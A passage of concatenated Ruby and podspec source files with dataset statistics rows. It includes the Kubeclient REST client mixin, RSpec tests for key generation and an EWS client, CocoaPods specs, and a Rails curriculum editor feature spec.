expect("#{repo_path}/blah.pub").to be_public_key_for("#{repo_path}/blah")
end
end
context 'with a recipe with a private_key and public_key_path and public_key_format' do
it 'the private_key and public_key are created' do
expect_recipe {
private_key "#{repo_path}/blah" do
public_key_path "#{repo_path}/blah.pub.der"
public_key_format :der
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(IO.read("#{repo_path}/blah.pub.der")).not_to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub.der").to be_public_key_for("#{repo_path}/blah")
end
end
context 'with a recipe with a private_key with path :none' do
it 'the private_key is created' do
got_private_key = nil
expect_recipe {
private_key 'in_memory' do
path :none
after { |resource, private_key| got_private_key = private_key }
end
}.to have_updated "private_key[in_memory]", :create
expect(got_private_key).to be_kind_of(OpenSSL::PKey::RSA)
end
end
end
| 38.782828 | 120 | 0.627425 |
2632fdc375a2a6cc3a7f2dd7e4c809556b9d91b3 | 19,598 | require 'json'
require 'rest-client'
module Kubeclient
# Common methods
# this is mixed in by other gems
module ClientMixin
ENTITY_METHODS = %w[get watch delete create update patch].freeze
DEFAULT_SSL_OPTIONS = {
client_cert: nil,
client_key: nil,
ca_file: nil,
cert_store: nil,
verify_ssl: OpenSSL::SSL::VERIFY_PEER
}.freeze
DEFAULT_AUTH_OPTIONS = {
username: nil,
password: nil,
bearer_token: nil,
bearer_token_file: nil
}.freeze
DEFAULT_SOCKET_OPTIONS = {
socket_class: nil,
ssl_socket_class: nil
}.freeze
DEFAULT_TIMEOUTS = {
# These do NOT affect watch, watching never times out.
open: Net::HTTP.new('127.0.0.1').open_timeout, # depends on ruby version
read: Net::HTTP.new('127.0.0.1').read_timeout
}.freeze
DEFAULT_HTTP_PROXY_URI = nil
SEARCH_ARGUMENTS = {
'labelSelector' => :label_selector,
'fieldSelector' => :field_selector,
'limit' => :limit,
'continue' => :continue
}.freeze
WATCH_ARGUMENTS = {
'labelSelector' => :label_selector,
'fieldSelector' => :field_selector,
'resourceVersion' => :resource_version
}.freeze
attr_reader :api_endpoint
attr_reader :ssl_options
attr_reader :auth_options
attr_reader :http_proxy_uri
attr_reader :headers
attr_reader :discovered
def initialize_client(
uri,
path,
version,
ssl_options: DEFAULT_SSL_OPTIONS,
auth_options: DEFAULT_AUTH_OPTIONS,
socket_options: DEFAULT_SOCKET_OPTIONS,
timeouts: DEFAULT_TIMEOUTS,
http_proxy_uri: DEFAULT_HTTP_PROXY_URI,
as: :ros
)
validate_auth_options(auth_options)
handle_uri(uri, path)
@entities = {}
@discovered = false
@api_version = version
@headers = {}
@ssl_options = ssl_options
@auth_options = auth_options
@socket_options = socket_options
# Allow passing partial timeouts hash, without unspecified
# @timeouts[:foo] == nil resulting in infinite timeout.
@timeouts = DEFAULT_TIMEOUTS.merge(timeouts)
@http_proxy_uri = http_proxy_uri ? http_proxy_uri.to_s : nil
@as = as
if auth_options[:bearer_token]
bearer_token(@auth_options[:bearer_token])
elsif auth_options[:bearer_token_file]
validate_bearer_token_file
bearer_token(File.read(@auth_options[:bearer_token_file]))
end
end
def method_missing(method_sym, *args, &block)
if discovery_needed?(method_sym)
discover
send(method_sym, *args, &block)
else
super
end
end
def respond_to_missing?(method_sym, include_private = false)
if discovery_needed?(method_sym)
discover
respond_to?(method_sym, include_private)
else
super
end
end
def discovery_needed?(method_sym)
!@discovered && ENTITY_METHODS.any? { |x| method_sym.to_s.start_with?(x) }
end
def handle_exception
yield
rescue RestClient::Exception => e
json_error_msg = begin
JSON.parse(e.response || '') || {}
rescue JSON::ParserError
{}
end
err_message = json_error_msg['message'] || e.message
error_klass = e.http_code == 404 ? ResourceNotFoundError : HttpError
raise error_klass.new(e.http_code, err_message, e.response)
end
def discover
load_entities
define_entity_methods
@discovered = true
end
def self.parse_definition(kind, name)
# "name": "componentstatuses", networkpolicies, endpoints
# "kind": "ComponentStatus" NetworkPolicy, Endpoints
# maintain pre group api compatibility for endpoints and securitycontextconstraints.
# See: https://github.com/kubernetes/kubernetes/issues/8115
kind = kind[0..-2] if %w[Endpoints SecurityContextConstraints].include?(kind)
prefix = kind =~ /[A-Z]/ ? kind[0..kind.rindex(/[A-Z]/)] : kind # NetworkP
m = name.match(/^#{prefix.downcase}(.*)$/)
m && OpenStruct.new(
entity_type: kind, # ComponentStatus
resource_name: name, # componentstatuses
method_names: [
ClientMixin.underscore_entity(kind), # component_status
ClientMixin.underscore_entity(prefix) + m[1] # component_statuses
]
)
end
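    # For example:
    #   ClientMixin.parse_definition('NetworkPolicy', 'networkpolicies')
    #   # => OpenStruct with entity_type 'NetworkPolicy', resource_name
    #   #    'networkpolicies', method_names ['network_policy', 'network_policies']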
def handle_uri(uri, path)
raise ArgumentError, 'Missing uri' unless uri
@api_endpoint = (uri.is_a?(URI) ? uri : URI.parse(uri))
@api_endpoint.path = path if @api_endpoint.path.empty?
@api_endpoint.path = @api_endpoint.path.chop if @api_endpoint.path.end_with?('/')
components = @api_endpoint.path.to_s.split('/') # ["", "api"] or ["", "apis", batch]
@api_group = components.length > 2 ? components[2] + '/' : ''
end
def build_namespace_prefix(namespace)
namespace.to_s.empty? ? '' : "namespaces/#{namespace}/"
end
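    # e.g. build_namespace_prefix('kube-system') # => "namespaces/kube-system/"
    #      build_namespace_prefix(nil)           # => ""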
def define_entity_methods
@entities.values.each do |entity|
# get all entities of a type e.g. get_nodes, get_pods, etc.
define_singleton_method("get_#{entity.method_names[1]}") do |options = {}|
get_entities(entity.entity_type, entity.resource_name, options)
end
# watch all entities of a type e.g. watch_nodes, watch_pods, etc.
define_singleton_method("watch_#{entity.method_names[1]}") do |options = {}|
# This method used to take resource_version as a param, so
# this conversion is to keep backwards compatibility
options = { resource_version: options } unless options.is_a?(Hash)
watch_entities(entity.resource_name, options)
end
# get a single entity of a specific type by name
define_singleton_method("get_#{entity.method_names[0]}") \
do |name, namespace = nil, opts = {}|
get_entity(entity.resource_name, name, namespace, opts)
end
define_singleton_method("delete_#{entity.method_names[0]}") \
do |name, namespace = nil, opts = {}|
delete_entity(entity.resource_name, name, namespace, opts)
end
define_singleton_method("create_#{entity.method_names[0]}") do |entity_config|
create_entity(entity.entity_type, entity.resource_name, entity_config)
end
define_singleton_method("update_#{entity.method_names[0]}") do |entity_config|
update_entity(entity.resource_name, entity_config)
end
define_singleton_method("patch_#{entity.method_names[0]}") do |name, patch, namespace = nil|
patch_entity(entity.resource_name, name, patch, namespace)
end
end
end
def self.underscore_entity(entity_name)
entity_name.gsub(/([a-z])([A-Z])/, '\1_\2').downcase
end
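    # e.g. ClientMixin.underscore_entity('ComponentStatus') # => "component_status"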
def create_rest_client(path = nil)
path ||= @api_endpoint.path
options = {
ssl_ca_file: @ssl_options[:ca_file],
ssl_cert_store: @ssl_options[:cert_store],
verify_ssl: @ssl_options[:verify_ssl],
ssl_client_cert: @ssl_options[:client_cert],
ssl_client_key: @ssl_options[:client_key],
proxy: @http_proxy_uri,
user: @auth_options[:username],
password: @auth_options[:password],
open_timeout: @timeouts[:open],
read_timeout: @timeouts[:read]
}
RestClient::Resource.new(@api_endpoint.merge(path).to_s, options)
end
def rest_client
@rest_client ||= begin
create_rest_client("#{@api_endpoint.path}/#{@api_version}")
end
end
# Accepts the following options:
# :namespace (string) - the namespace of the entity.
# :name (string) - the name of the entity to watch.
# :label_selector (string) - a selector to restrict the list of returned objects by labels.
# :field_selector (string) - a selector to restrict the list of returned objects by fields.
# :resource_version (string) - shows changes that occur after passed version of a resource.
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def watch_entities(resource_name, options = {})
ns = build_namespace_prefix(options[:namespace])
path = "watch/#{ns}#{resource_name}"
path += "/#{options[:name]}" if options[:name]
uri = @api_endpoint.merge("#{@api_endpoint.path}/#{@api_version}/#{path}")
params = {}
WATCH_ARGUMENTS.each { |k, v| params[k] = options[v] if options[v] }
uri.query = URI.encode_www_form(params) if params.any?
Kubeclient::Common::WatchStream.new(
uri,
http_options(uri),
formatter: ->(value) { format_response(options[:as] || @as, value) }
)
end
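    # Illustrative call through a generated watcher — assumes discovery has
    # defined `watch_pods` on the client:
    #   client.watch_pods(namespace: 'default').each { |notice| puts notice.type }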
# Accepts the following options:
# :namespace (string) - the namespace of the entity.
# :label_selector (string) - a selector to restrict the list of returned objects by labels.
# :field_selector (string) - a selector to restrict the list of returned objects by fields.
# :limit (integer) - a maximum number of items to return in each response
# :continue (string) - a token used to retrieve the next chunk of entities
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def get_entities(entity_type, resource_name, options = {})
params = {}
SEARCH_ARGUMENTS.each { |k, v| params[k] = options[v] if options[v] }
ns_prefix = build_namespace_prefix(options[:namespace])
response = handle_exception do
rest_client[ns_prefix + resource_name]
.get({ 'params' => params }.merge(@headers))
end
format_response(options[:as] || @as, response.body, entity_type)
end
# Accepts the following options:
# :as (:raw|:ros) - defaults to :ros
# :raw - return the raw response body as a string
# :ros - return a collection of RecursiveOpenStruct objects
def get_entity(resource_name, name, namespace = nil, options = {})
ns_prefix = build_namespace_prefix(namespace)
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.get(@headers)
end
format_response(options[:as] || @as, response.body)
end
# delete_options are passed as a JSON payload in the delete request
def delete_entity(resource_name, name, namespace = nil, delete_options: {})
delete_options_hash = delete_options.to_hash
ns_prefix = build_namespace_prefix(namespace)
payload = delete_options_hash.to_json unless delete_options_hash.empty?
response = handle_exception do
rs = rest_client[ns_prefix + resource_name + "/#{name}"]
RestClient::Request.execute(
rs.options.merge(
method: :delete,
url: rs.url,
headers: { 'Content-Type' => 'application/json' }.merge(@headers),
payload: payload
)
)
end
format_response(@as, response.body)
end
def create_entity(entity_type, resource_name, entity_config)
# Duplicate the entity_config to a hash so that when we assign
# kind and apiVersion, this does not mutate original entity_config obj.
hash = entity_config.to_hash
ns_prefix = build_namespace_prefix(hash[:metadata][:namespace])
# TODO: temporary solution to add "kind" and apiVersion to request
# until this issue is solved
# https://github.com/GoogleCloudPlatform/kubernetes/issues/6439
# TODO: #2 solution for
# https://github.com/kubernetes/kubernetes/issues/8115
hash[:kind] = (entity_type.eql?('Endpoint') ? 'Endpoints' : entity_type)
hash[:apiVersion] = @api_group + @api_version
response = handle_exception do
rest_client[ns_prefix + resource_name]
.post(hash.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
format_response(@as, response.body)
end
def update_entity(resource_name, entity_config)
name = entity_config[:metadata][:name]
ns_prefix = build_namespace_prefix(entity_config[:metadata][:namespace])
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.put(entity_config.to_h.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
format_response(@as, response.body)
end
def patch_entity(resource_name, name, patch, namespace = nil)
ns_prefix = build_namespace_prefix(namespace)
response = handle_exception do
rest_client[ns_prefix + resource_name + "/#{name}"]
.patch(
patch.to_json,
{ 'Content-Type' => 'application/strategic-merge-patch+json' }.merge(@headers)
)
end
format_response(@as, response.body)
end
def all_entities(options = {})
discover unless @discovered
@entities.values.each_with_object({}) do |entity, result_hash|
# method call for get each entities
# build hash of entity name to array of the entities
method_name = "get_#{entity.method_names[1]}"
begin
result_hash[entity.method_names[0]] = send(method_name, options)
rescue Kubeclient::HttpError
next # do not fail due to resources not supporting get
end
end
end
def get_pod_log(pod_name, namespace,
container: nil, previous: false,
timestamps: false, since_time: nil, tail_lines: nil)
params = {}
params[:previous] = true if previous
params[:container] = container if container
params[:timestamps] = timestamps if timestamps
params[:sinceTime] = format_datetime(since_time) if since_time
params[:tailLines] = tail_lines if tail_lines
ns = build_namespace_prefix(namespace)
handle_exception do
rest_client[ns + "pods/#{pod_name}/log"]
.get({ 'params' => params }.merge(@headers))
end
end
def watch_pod_log(pod_name, namespace, container: nil)
# Adding the "follow=true" query param tells the Kubernetes API to keep
# the connection open and stream updates to the log.
params = { follow: true }
params[:container] = container if container
ns = build_namespace_prefix(namespace)
uri = @api_endpoint.dup
uri.path += "/#{@api_version}/#{ns}pods/#{pod_name}/log"
uri.query = URI.encode_www_form(params)
Kubeclient::Common::WatchStream.new(uri, http_options(uri), formatter: ->(value) { value })
end
def proxy_url(kind, name, port, namespace = '')
discover unless @discovered
entity_name_plural =
if %w[services pods nodes].include?(kind.to_s)
kind.to_s
else
@entities[kind.to_s].resource_name
end
ns_prefix = build_namespace_prefix(namespace)
rest_client["#{ns_prefix}#{entity_name_plural}/#{name}:#{port}/proxy"].url
end
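    # e.g. proxy_url(:service, 'web', 8080, 'default') might return
    # "https://host/api/v1/namespaces/default/services/web:8080/proxy"
    # (scheme, host, and port depend on the configured api_endpoint).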
def process_template(template)
ns_prefix = build_namespace_prefix(template[:metadata][:namespace])
response = handle_exception do
rest_client[ns_prefix + 'processedtemplates']
.post(template.to_h.to_json, { 'Content-Type' => 'application/json' }.merge(@headers))
end
JSON.parse(response)
end
def api_valid?
result = api
result.is_a?(Hash) && (result['versions'] || []).any? do |group|
@api_group.empty? ? group.include?(@api_version) : group['version'] == @api_version
end
end
def api
response = handle_exception { create_rest_client.get(@headers) }
JSON.parse(response)
end
private
    # Format datetime according to RFC 3339
def format_datetime(value)
case value
when DateTime, Time
value.strftime('%FT%T.%9N%:z')
when String
value
else
raise ArgumentError, "unsupported type '#{value.class}' of time value '#{value}'"
end
end
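    # e.g. format_datetime(Time.at(0).utc) # => "1970-01-01T00:00:00.000000000+00:00"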
def format_response(as, body, list_type = nil)
case as
when :raw
body
when :parsed
JSON.parse(body)
when :parsed_symbolized
JSON.parse(body, symbolize_names: true)
when :ros
result = JSON.parse(body)
if list_type
resource_version =
result.fetch('resourceVersion') do
result.fetch('metadata', {}).fetch('resourceVersion', nil)
end
# If 'limit' was passed save the continue token
# see https://kubernetes.io/docs/reference/using-api/api-concepts/#retrieving-large-results-sets-in-chunks
continue = result.fetch('metadata', {}).fetch('continue', nil)
# result['items'] might be nil due to https://github.com/kubernetes/kubernetes/issues/13096
collection = result['items'].to_a.map { |item| Kubeclient::Resource.new(item) }
Kubeclient::Common::EntityList.new(list_type, resource_version, collection, continue)
else
Kubeclient::Resource.new(result)
end
else
raise ArgumentError, "Unsupported format #{as.inspect}"
end
end
def load_entities
@entities = {}
fetch_entities['resources'].each do |resource|
next if resource['name'].include?('/')
resource['kind'] ||=
Kubeclient::Common::MissingKindCompatibility.resource_kind(resource['name'])
entity = ClientMixin.parse_definition(resource['kind'], resource['name'])
@entities[entity.method_names[0]] = entity if entity
end
end
def fetch_entities
JSON.parse(handle_exception { rest_client.get(@headers) })
end
def bearer_token(bearer_token)
@headers ||= {}
@headers[:Authorization] = "Bearer #{bearer_token}"
end
def validate_auth_options(opts)
# maintain backward compatibility:
opts[:username] = opts[:user] if opts[:user]
if %i[bearer_token bearer_token_file username].count { |key| opts[key] } > 1
raise(
ArgumentError,
'Invalid auth options: specify only one of username/password,' \
' bearer_token or bearer_token_file'
)
elsif %i[username password].count { |key| opts[key] } == 1
raise ArgumentError, 'Basic auth requires both username & password'
end
end
def validate_bearer_token_file
msg = "Token file #{@auth_options[:bearer_token_file]} does not exist"
raise ArgumentError, msg unless File.file?(@auth_options[:bearer_token_file])
msg = "Cannot read token file #{@auth_options[:bearer_token_file]}"
raise ArgumentError, msg unless File.readable?(@auth_options[:bearer_token_file])
end
def http_options(uri)
options = {
basic_auth_user: @auth_options[:username],
basic_auth_password: @auth_options[:password],
headers: @headers,
http_proxy_uri: @http_proxy_uri
}
if uri.scheme == 'https'
options[:ssl] = {
ca_file: @ssl_options[:ca_file],
cert: @ssl_options[:client_cert],
cert_store: @ssl_options[:cert_store],
key: @ssl_options[:client_key],
# ruby HTTP uses verify_mode instead of verify_ssl
# http://ruby-doc.org/stdlib-1.9.3/libdoc/openssl/rdoc/OpenSSL/SSL/SSLContext.html
verify_mode: @ssl_options[:verify_ssl]
}
end
options.merge(@socket_options)
end
end
end
| 35.632727 | 116 | 0.642055 |
21b69f41b38f77be0a658212dcd7a2514850266f | 1,446 | require "spec_helper"
describe Viewpoint::EWSClient do
describe "#set_auto_deepen" do
let(:client) { described_class.new "http://www.example.com", "test", "test" }
it "sets autodeepen to true on the web service" do
ews = double "ews"
expect(ews).to receive(:auto_deepen=).with(true) {true}
expect(client).to receive(:ews) {ews}
client.set_auto_deepen true
end
it "sets autodeepen to false on the web service with a behavior of 'raise'" do
ews = double "ews"
expect(ews).to receive(:no_auto_deepen_behavior=).with(:raise) {:raise}
expect(ews).to receive(:auto_deepen=).with(false) {false}
expect(client).to receive(:ews).twice {ews}
client.set_auto_deepen false
end
end
describe '#new' do
let(:connection) { instance_double(Viewpoint::EWS::Connection, set_auth: nil, set_bearer: nil) }
let(:http_class) { class_double(Viewpoint::EWS::Connection, new: connection) }
context 'new with basic auth' do
it do
described_class.new "http://www.example.com", "username", "password", http_class: http_class
expect(connection).to have_received(:set_auth).with("username", "password")
end
end
context 'new with token auth' do
it do
described_class.new "http://www.example.com", :bearer, "token", http_class: http_class
expect(connection).not_to have_received(:set_auth)
end
end
end
end
| 32.133333 | 101 | 0.66805 |
ac414a981e00000af5db04ebe9e4a9c8531b215f | 702 | Pod::Spec.new do |s|
s.platform = :ios
s.ios.deployment_target = '10.0'
s.name = "SwipeDownViewController"
s.summary = "SwipeDownViewController lets a user dismiss a ViewController using a swipe down gesture."
s.requires_arc = true
s.version = "0.1.0"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Allan Scofield" => "[email protected]" }
s.homepage = "https://github.com/allanscofield/SwapDownViewController"
s.source = { :git => "https://github.com/allanscofield/SwapDownViewController.git", :tag => "#{s.version}" }
s.framework = "UIKit"
s.source_files = "SwipeDownViewController/Sources/*.{swift}"
s.swift_version = "4.2"
end
| 39 | 112 | 0.65812 |
1af9c78a8d38ebfb58b43c66b0eb45246143eea4 | 3,919 | require 'json'
require 'date'
root = ENV['EMISSION_ROOT'] || __dir__
pkg_version = lambda do |dir_from_root = '', version = 'version'|
path = File.join(root, dir_from_root, 'package.json')
JSON.load(File.read(path))[version]
end
emission_version = pkg_version.call
emission_native_version = pkg_version.call('', 'native-code-version')
react_native_version = pkg_version.call('node_modules/react-native')
podspec = Pod::Spec.new do |s|
s.name = 'Emission'
s.version = emission_version
s.summary = 'React Native Components used by Eigen.'
s.homepage = 'https://github.com/artsy/emission'
s.license = 'MIT'
s.author = { 'Artsy Mobile' => '[email protected]' }
s.source = { git: 'https://github.com/artsy/emission.git', tag: "v#{s.version}" }
s.platform = :ios, '12.0'
s.source_files = 'Pod/Classes/**/*.{h,m}'
s.preserve_paths = 'Pod/Classes/**/*.generated.objc'
s.resources = 'Pod/Assets/{Emission.js,assets,PreHeatedGraphQLCache}'
# Required for email composer
s.framework = 'MessageUI'
# Artsy UI dependencies
s.dependency 'Artsy+UIColors'
s.dependency 'Artsy+UIFonts', '>= 3.0.0'
s.dependency 'Extraction', '>= 1.2.1'
# Used in City Guides
s.dependency 'Pulley'
# Used in ARGraphQLQueryCache
s.dependency 'ISO8601DateFormatter'
# To ensure a consistent image cache between app/lib
s.dependency 'SDWebImage', '>= 3.7.2', '< 4'
# For custom animations in DeepZoomOverlay
s.dependency 'INTUAnimationEngine'
# React, and the subspecs we have to use
s.dependency 'React-Core', react_native_version
s.dependency 'React-cxxreact', react_native_version
s.dependency 'React-RCTAnimation', react_native_version
s.dependency 'React-RCTImage', react_native_version
s.dependency 'React-RCTLinking', react_native_version
s.dependency 'React-RCTNetwork', react_native_version
s.dependency 'React-RCTText', react_native_version
# s.dependency 'React-RCTGeolocation', react_native_version
s.dependency 'React-RCTActionSheet', react_native_version
# React's Dependencies
# s.dependency 'Yoga', "#{react_native_version}.React"
react_podspecs = [
'node_modules/react-native/third-party-podspecs/DoubleConversion.podspec',
'node_modules/react-native/third-party-podspecs/Folly.podspec',
'node_modules/react-native/third-party-podspecs/glog.podspec'
]
# Native dependencies of Emission, which come from node_modules
dep_podspecs = [
'node_modules/tipsi-stripe/tipsi-stripe.podspec',
'node_modules/@mapbox/react-native-mapbox-gl/react-native-mapbox-gl.podspec',
'node_modules/react-native-sentry/SentryReactNative.podspec',
'node_modules/react-native-svg/RNSVG.podspec',
'node_modules/react-native-navigator-ios/react-native-navigator-ios.podspec',
'node_modules/@react-native-community/cameraroll/react-native-cameraroll.podspec',
'node_modules/@react-native-community/netinfo/react-native-netinfo.podspec',
'node_modules/@react-native-community/geolocation/react-native-geolocation.podspec'
]
# Ties the exact versions so host apps don't need to guess the version
# or have a potential mismatch
podspecs = react_podspecs + dep_podspecs
podspecs.each do |podspec_path|
spec = Pod::Specification.from_file podspec_path
s.dependency spec.name, spec.version.to_s
end
end
if ENV['INCLUDE_METADATA']
# Attach the useful metadata to the podspec, which can be used in admin tools
podspec.attributes_hash['native_version'] = emission_native_version
podspec.attributes_hash['release_date'] = DateTime.now.strftime('%h %d, %Y')
podspec.attributes_hash['sha'] = `git rev-parse HEAD`.strip
podspec.attributes_hash['react_native_version'] = react_native_version
podspec.attributes_hash['app_registry'] = File.read('./src/lib/AppRegistry.tsx').scan(/AppRegistry.registerComponent\(\"(.*)\"/).flatten
end
podspec
| 40.402062 | 138 | 0.734116 |
01d93ea8483c2e1d2a1f2eaf464464d9d86f545f | 638 | class Country
include ActiveModel::Model
attr_reader :simple_id, :entity_id, :enabled
validates_presence_of :simple_id, :entity_id, :enabled
def initialize(hash)
@simple_id = hash['simple_id']
@entity_id = hash['entity_id']
@enabled = hash['enabled']
end
def self.from_api(hash)
new(
'simple_id' => hash['simpleId'],
'entity_id' => hash['entityId'],
'enabled' => hash['enabled']
)
end
def self.from_session(object)
return object if object.is_a? Country
new(object) if object.is_a?(Hash) || (object.is_a?(SelectedProviderData) && object.is_selected_country?)
end
end
| 24.538462 | 108 | 0.667712 |
114a4acd354a6c80b37e1b6633245341134af994 | 12,124 | require 'rails_helper'
feature 'Curriculum Editor', js: true do
include UserSpecHelper
include MarkdownEditorHelper
include NotificationHelper
# Setup a course with a single founder target, ...
let!(:school) { create :school, :current }
let!(:course) { create :course, school: school }
let!(:course_2) { create :course, school: school }
let!(:course_3) { create :course, school: school }
let!(:evaluation_criterion) { create :evaluation_criterion, course: course }
let!(:school_admin) { create :school_admin, school: school }
let!(:faculty) { create :faculty, school: school }
let!(:course_author) { create :course_author, course: course, user: faculty.user }
let!(:course_author_2) { create :course_author, course: course_2, user: faculty.user }
let!(:level_1) { create :level, :one, course: course }
let!(:level_2) { create :level, :two, course: course }
let!(:target_group_1) { create :target_group, level: level_1, sort_index: 1 }
let!(:target_group_2) { create :target_group, level: level_2, sort_index: 1 }
let!(:target_1) { create :target, target_group: target_group_1 }
let!(:target_2) { create :target, target_group: target_group_1, prerequisite_targets: [target_5] }
let!(:target_3) { create :target, target_group: target_group_2 }
let!(:target_4) { create :target, target_group: target_group_2, prerequisite_targets: [target_3] }
# Target with contents
let!(:target_5) { create :target, :with_content, target_group: target_group_2 }
# Data for level
let(:new_level_name) { Faker::Lorem.sentence }
let(:date) { Time.zone.today }
# Data for target group 1
let(:new_target_group_name) { Faker::Lorem.sentence }
let(:new_target_group_description) { Faker::Lorem.sentence }
# Data for target group 2
let(:new_target_group_name_2) { Faker::Lorem.sentence }
# Data for a normal target
let(:new_target_1_title) { Faker::Lorem.sentence }
around do |example|
Time.use_zone(school_admin.user.time_zone) { example.run }
end
scenario 'admin creates a basic course framework by adding level, target group and targets' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course, level: 1)
# When the level number is specified as a param, it should be selected.
expect(page).to have_text(target_group_1.name)
visit(curriculum_school_course_path(course))
    # Visiting the page without the level param should default selection to the max level, with all its targets and groups visible.
expect(page).to have_text(target_group_2.name)
expect(page).to have_text(target_3.title)
expect(page).to have_text(target_4.title)
# targets and target groups from other levels should not be visible
expect(page).not_to have_text(target_group_1.name)
expect(page).not_to have_text(target_1.title)
expect(page).not_to have_text(target_2.title)
# he should be able to create a new level
click_button 'Create Chapter'
expect(page).to have_text('Chapter Name')
fill_in 'Chapter Name', with: new_level_name
fill_in 'Unlock chapter on', with: date.iso8601
click_button 'Create New Chapter'
expect(page).to have_text('Chapter created successfully')
dismiss_notification
level = course.reload.levels.last
expect(level.name).to eq(new_level_name)
expect(level.unlock_at).to eq(Time.zone.now.beginning_of_day)
# he should be able to edit the level
find('button[title="Edit selected chapter"').click
expect(page).to have_text(new_level_name)
fill_in 'Unlock chapter on', with: '', fill_options: { clear: :backspace }
click_button 'Update Chapter'
expect(page).to have_text('Chapter updated successfully')
dismiss_notification
expect(level.reload.unlock_at).to eq(nil)
# he should be able to create a new target group
find('.target-group__create').click
expect(page).to have_text('SECTION DETAILS')
fill_in 'Title', with: new_target_group_name
replace_markdown(new_target_group_description, id: 'description')
click_button 'Yes'
click_button 'Create Section'
expect(page).to have_text('Section created successfully')
dismiss_notification
level.reload
target_group = level.target_groups.last
expect(target_group.name).to eq(new_target_group_name)
expect(target_group.description).to eq(new_target_group_description)
expect(target_group.milestone).to eq(true)
# he should be able to update a target group
current_sort_index = target_group.sort_index
find('.target-group__header', text: target_group.name).click
expect(page).to have_text(target_group.name)
expect(page).to have_text(target_group.description)
fill_in 'Description', with: '', fill_options: { clear: :backspace }
within('.milestone') do
click_button 'No'
end
click_button 'Update Section'
expect(page).to have_text('Section updated successfully')
dismiss_notification
target_group.reload
expect(target_group.description).not_to eq(new_target_group_description)
expect(target_group.milestone).to eq(false)
expect(target_group.sort_index).to eq(current_sort_index)
# he should be able to create another target group
find('.target-group__create').click
expect(page).to have_text('SECTION DETAILS')
fill_in 'Title', with: new_target_group_name_2
click_button 'Yes'
click_button 'Create Section'
expect(page).to have_text('Section created successfully')
dismiss_notification
# Update sort index
find("#target-group-move-down-#{target_group.id}").click
expect { target_group.reload.sort_index }.to eventually(eq 1)
sleep 0.2
find("#target-group-move-up-#{target_group.id}").click
expect { target_group.reload.sort_index }.to eventually(eq 0)
sleep 0.2
# user should be able to create a draft target from the curriculum index
find("#create-target-input#{target_group.id}").click
fill_in "create-target-input#{target_group.id}", with: new_target_1_title
click_button 'Create'
expect(page).to have_text('Lesson created successfully')
dismiss_notification
target = target_group.reload.targets.last
expect(target.title).to eq(new_target_1_title)
expect(page).to have_text(new_target_1_title)
within("a#target-show-#{target.id}") do
expect(page).to have_text('Draft')
end
end
scenario 'course author can navigate only to assigned courses and modify content of those courses' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
click_button course.name
expect(page).to have_link(course_2.name, href: "/school/courses/#{course_2.id}/curriculum")
expect(page).to_not have_link(course_3.name, href: "/school/courses/#{course_3.id}/curriculum")
click_link course_2.name
expect(page).to have_button(course_2.name)
expect(page).to_not have_link(href: '/school/coaches')
expect(page).to_not have_link(href: '/school/customize')
expect(page).to_not have_link(href: '/school/courses')
expect(page).to_not have_link(href: '/school/communities')
expect(page).to have_link(href: '/dashboard')
[school_path, curriculum_school_course_path(course_3), school_communities_path, school_courses_path, customize_school_path].each do |path|
visit path
expect(page).to have_text("The page you were looking for doesn't exist!")
end
visit curriculum_school_course_path(course)
find("#create-target-input#{target_group_2.id}").click
fill_in "create-target-input#{target_group_2.id}", with: new_target_1_title
click_button 'Create'
expect(page).to have_text('Lesson created successfully')
dismiss_notification
end
scenario "author sets unlock date for a level that previously didn't have one" do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
fill_in 'Unlock chapter on', with: date.iso8601
click_button 'Update Chapter'
expect(page).to have_text('Chapter updated successfully')
expect(level_2.reload.unlock_at).to eq(Time.zone.now.beginning_of_day)
end
context 'when there is a level zero and three other levels' do
let(:level_0) { create :level, :zero, course: course }
let(:level_3) { create :level, :three, course: course }
let!(:target_group_l0) { create :target_group, level: level_0 }
let!(:target_group_l3) { create :target_group, level: level_3 }
let!(:team_l3) { create :startup, level: level_3 }
scenario 'author merges third level into the first' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
select "C1: #{level_1.name}", from: 'Delete & Merge Into'
accept_confirm do
click_button 'Merge and Delete'
end
expect(page).to have_text(target_group_2.name)
expect { level_3.reload }.to raise_error(ActiveRecord::RecordNotFound)
expect(target_group_l3.reload.level).to eq(level_1)
expect(team_l3.reload.level).to eq(level_1)
end
scenario 'author is not allowed to merge third level into level zero' do
sign_in_user course_author.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
expect(page).not_to have_text("C0: #{level_0.name}")
end
end
scenario 'admin moves a target group from one level to another' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('.target-group__header', text: target_group_2.name).click
expect(page).to have_text("Chapter #{target_group_2.level.number}: #{target_group_2.level.name}")
fill_in 'level_id', with: level_1.name
click_button "Pick Chapter 1: #{level_1.name}"
click_button 'Update Section'
expect(page).to have_text('Section updated successfully')
dismiss_notification
expect(target_group_2.reload.level).to eq(level_1)
expect(target_group_2.sort_index).to eq(2)
expect(target_2.reload.prerequisite_targets).to eq([])
expect(target_4.reload.prerequisite_targets).to eq([])
end
scenario 'user who is not logged in gets redirected to sign in page' do
visit curriculum_school_course_path(course)
expect(page).to have_text('Please sign in to continue.')
end
context 'copy level into course' do
let!(:target_1) { create :target, :with_content, target_group: target_group_1 }
let!(:target_2) { create :target, :with_content, target_group: target_group_1, prerequisite_targets: [target_5] }
let!(:target_3) { create :target, :with_content, target_group: target_group_2 }
let!(:target_4) { create :target, :with_content, target_group: target_group_2, prerequisite_targets: [target_3] }
